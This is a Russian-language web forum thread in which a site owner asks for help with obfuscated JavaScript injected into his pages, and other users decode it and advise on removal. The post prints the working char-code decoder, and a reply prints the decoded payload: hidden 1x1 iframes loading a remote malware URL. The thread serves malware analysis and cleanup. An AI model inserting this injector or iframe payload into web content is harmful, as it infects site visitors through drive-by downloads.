Модераторы: Sardar, Aliance
  

Поиск:

Ответ в темуСоздание новой темы Создание опроса
> троян, вроде яваскриптовый троян 
:(
    Опции темы
Dave
Дата 4.10.2007, 11:09 (ссылка) | (нет голосов) Загрузка ... Загрузка ... Быстрая цитата Цитата


Бывалый
*


Профиль
Группа: Участник
Сообщений: 190
Регистрация: 17.6.2004

Репутация: нет
Всего: 1



Всем привет!
у себя на сайте обнаружил в самом низу страницы появился следующий яваскрипт
Код


<!-- ~ --><script LANGUAGE="JavaScript">
<!--
function Decode(){
var temp="",i,c=0,out="";
var str="60!105!102!114!97!109!101!32!115!114!99!61!34!104!116!116!112!58!47!47!118!111!108!107!111!101!98!46!105!110!102!111!47!120!100!47!103!111!46!112!104!112!63!115!105!100!61!49!34!32!119!105!100!116!104!61!49!32!104!101!105!103!104!116!61!49!32!115!116!121!108!101!61!34!100!105!115!112!108!97!121!58!110!111!110!101!34!62!60!47!105!102!114!97!109!101!62!13!10!60!105!102!114!97!109!101!32!115!114!99!61!34!104!116!116!112!58!47!47!118!111!108!107!111!101!98!46!105!110!102!111!47!120!100!47!103!111!46!112!104!112!63!115!105!100!61!50!34!32!119!105!100!116!104!61!49!32!104!101!105!103!104!116!61!49!32!115!116!121!108!101!61!34!100!105!115!112!108!97!121!58!110!111!110!101!34!62!60!47!105!102!114!97!109!101!62!13!10!60!105!102!114!97!109!101!32!115!114!99!61!34!104!116!116!112!58!47!47!118!111!108!107!111!101!98!46!105!110!102!111!47!120!100!47!103!111!46!112!104!112!63!115!105!100!61!51!34!32!119!105!100!116!104!61!49!32!104!101!105!103!104!116!61!49!32!115!116!121!108!101!61!34!100!105!115!112!108!97!121!58!110!111!110!101!34!62!60!47!105!102!114!97!109!101!62!13!10!60!105!102!114!97!109!101!32!115!114!99!61!34!104!116!116!112!58!47!47!118!111!108!107!111!101!98!46!105!110!102!111!47!120!100!47!103!111!46!112!104!112!63!115!105!100!61!52!34!32!119!105!100!116!104!61!49!32!104!101!105!103!104!116!61!49!32!115!116!121!108!101!61!34!100!105!115!112!108!97!121!58!110!111!110!101!34!62!60!47!105!102!114!97!109!101!62!";
l=str.length;while(c<=str.length-1)
{while(str.charAt(c)!='!')temp=temp+str.charAt(c++);
c++;
out=out+String.fromCharCode(temp);
temp="";}
document.write(out);}
//-->
</SCRIPT><script LANGUAGE="JavaScript">
<!--
Decode();
//-->
</SCRIPT><!-- ~ -->

Эта дрянь запустила у меня на компе какой то ява-апплет, он в свою очередь заблокировал диспетчер задач, комп начала сильно тормозить. вылечится не смог, переустановил ОС :(

у меня два вопроса:
1.что делает этя ф-я ? похоже что декодирует строку а затем выводит ее на экран, а дальше как работает ? Нужно разобратся что именно она пишет. Может кому то интересно поковырятся и разобратся.
2. Как от нее избавиться ? не могу вытулить ее из сайта. Сайт написан на php + smarty, в шаблонах ее нет, видимо она сама как то добавляется в страницу, причем не в самый конец, сейчас она находится сразу после закрывающего тега form а дальше после этой ф-ии html обрывается , то есть нет </body></html>

Вначале эта ф-я была во фронтенде сайта, потом исчезла, сейчас появилась в админке. Адрес сайта: shock.com.ru Но, не ходите по ссылке если у вас нету фаерволла или антивируса !!! Если кто может то зайдите на страничку, может найдете эксплойт какой нибудь, вобщем мне нужен совет.  



Спасибо.

Добавлено после первого ответа: заходил на сайт через ИЕ :(

Это сообщение отредактировал(а) Dave - 4.10.2007, 11:18
PM MAIL   Вверх
vasac
Дата 4.10.2007, 11:14 (ссылка) |    (голосов:1) Загрузка ... Загрузка ... Быстрая цитата Цитата


Эксперт
***


Профиль
Группа: Завсегдатай
Сообщений: 1060
Регистрация: 4.5.2006

Репутация: 13
Всего: 36



Есть вирусы, которые лезут через IE, тырят пароли от ФТП, а на нем уже вставляют в индексные файлы всякую дрянь.
Так что первым делом проверить комп антивирусом и сменить пароли. Всем кто еще их имеет, проделать тоже самое.
Можете попробовать убрать document.write() и вывести out, например, через alert() или в textarea через value. Скорее всего там создается какой-нибудь ифрейм.

Добавлено через 6 минут и 22 секунды
Ага
Код

<iframe src="http://volkoeb.info/xd/go.php?sid=1" width=1 height=1 style="display:none"></iframe> <iframe src="http://volkoeb.info/xd/go.php?sid=2" width=1 height=1 style="display:none"></iframe> <iframe src="http://volkoeb.info/xd/go.php?sid=3" width=1 height=1 style="display:none"></iframe> <iframe src="http://volkoeb.info/xd/go.php?sid=4" width=1 height=1 style="display:none"></iframe>

PM WWW   Вверх
Pokoinik
Дата 4.10.2007, 11:32 (ссылка) | (нет голосов) Загрузка ... Загрузка ... Быстрая цитата Цитата


Опытный
**


Профиль
Группа: Участник
Сообщений: 283
Регистрация: 17.3.2007
Где: /dev/null

Репутация: 1
Всего: 3



Dave, ищи этот код в пхп файлах...
в принципе он может быть закодирован например в base64,
или добавляться через obstart,
в общем читай логи и смотри какие файлы изменились...


--------------------
ICQ: 490-993
Существует только 10 типов людей: те, которые понимают двоичную систему, и которые ее не понимают!!!
Опасайтесь людей верующих, ибо у них есть боги, которые им все прощают.

Делай или не делай! Никаких попробую!
Йода (Yoda), мастер-джедай
PM MAIL ICQ   Вверх
Dave
Дата 4.10.2007, 12:18 (ссылка) | (нет голосов) Загрузка ... Загрузка ... Быстрая цитата Цитата


Бывалый
*


Профиль
Группа: Участник
Сообщений: 190
Регистрация: 17.6.2004

Репутация: нет
Всего: 1



Цитата(Pokoinik @  4.10.2007,  11:32 Найти цитируемый пост)
 ищи этот код в пхп файлах...

Ты прав! В index.php в админке был зашит этот код, спасибо !
поменяю пароль на фтп, надеюсь только в этом дело smile
PM MAIL   Вверх
Pokoinik
Дата 4.10.2007, 12:34 (ссылка) | (нет голосов) Загрузка ... Загрузка ... Быстрая цитата Цитата


Опытный
**


Профиль
Группа: Участник
Сообщений: 283
Регистрация: 17.3.2007
Где: /dev/null

Репутация: 1
Всего: 3



Dave, посмотри еще файлы пхп на предмет наличие левого кода,
потому как в скриптах могут быть шелы, или пр. фигня...


--------------------
ICQ: 490-993
Существует только 10 типов людей: те, которые понимают двоичную систему, и которые ее не понимают!!!
Опасайтесь людей верующих, ибо у них есть боги, которые им все прощают.

Делай или не делай! Никаких попробую!
Йода (Yoda), мастер-джедай
PM MAIL ICQ   Вверх
  
Ответ в темуСоздание новой темы Создание опроса
Форум для вопросов, которые имеются в справочниках, но их поиск вызвал затруднения, или для разработчика требуется совет или просьба отыскать ошибку. Напоминаем: 1) чётко формулируйте вопрос, 2) приведите пример того, что уже сделано, 3) укажите явно, нужен работающий пример или подсказка о том, где найти информацию.
 
1 Пользователей читают эту тему (1 Гостей и 0 Скрытых Пользователей)
0 Пользователей:
« Предыдущая тема | JavaScript: Общие вопросы | Следующая тема »


 




[ Время генерации скрипта: 0.0701 ]   [ Использовано запросов: 21 ]   [ GZIP включён ]


Реклама на сайте     Информационное спонсорство

 
По вопросам размещения рекламы пишите на vladimir(sobaka)vingrad.ru
Отказ от ответственности     Powered by Invision Power Board(R) 1.3 © 2003  IPS, Inc.